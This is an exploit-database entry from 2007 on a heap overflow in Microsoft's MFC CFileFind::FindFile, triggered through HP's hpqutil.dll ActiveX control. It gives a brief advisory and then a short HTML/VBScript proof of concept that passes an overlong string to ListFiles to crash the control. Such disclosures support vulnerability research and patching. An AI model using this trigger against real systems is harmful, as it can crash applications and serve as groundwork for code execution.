Lucene search
Jonathan SarbaEDB-ID:30593HistorySep 14, 2007 - 12:00 a.m.
Microsoft MFC Library - CFileFind::FindFile Buffer Overflow
2007-09-1400:00:00
Jonathan Sarba
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/25697/info
The CFileFind::FindFile method in the MFC library for Microsoft Windows is prone to a buffer-overflow vulnerability because the method fails to perform adequate boundary checks of user-supplied input.
Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of applications that use the vulnerable method.
The MFC library included with Microsoft Windows XP SP2 is affected; other versions may also be affected.
This issue also occurs in the 'hpqutil.dll' ActiveX control identified by CLSID: F3F381A3-4795-41FF-8190-7AA2A8102F85.
<object classid='clsid:F3F381A3-4795-41FF-8190-7AA2A8102F85' id='pAF'>
</object>
<input type="button" value="heap" language="VBScript" OnClick="OuCh()">
<script language="VBScript">
sub OuCh()
Var_0 = String(620, "A")
pAF.ListFiles Var_0
End Sub
</script>Related
seebug
seebug
Microsoft MFC库CFileFind::FindFile堆溢出漏洞
2007-12-20 00:00:00
prion
prion
Heap overflow
2007-09-17 17:17:00
cve
cve
CVE-2007-4916
2007-09-17 17:17:00
cert
cert
Microsoft MFC FindFile function heap buffer overflow
2007-09-20 00:00:00
cvelist
cvelist
CVE-2007-4916
2007-09-17 17:00:00
exploitdb
exploitdb
HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)
2007-09-14 00:00:00
nvd
nvd
CVE-2007-4916
2007-09-17 17:17:00
checkpoint_advisories
checkpoint_advisories
Microsoft Windows MFC Library FileFind Class Heap Overflow (CVE-2007-4916)
2007-11-05 00:00:00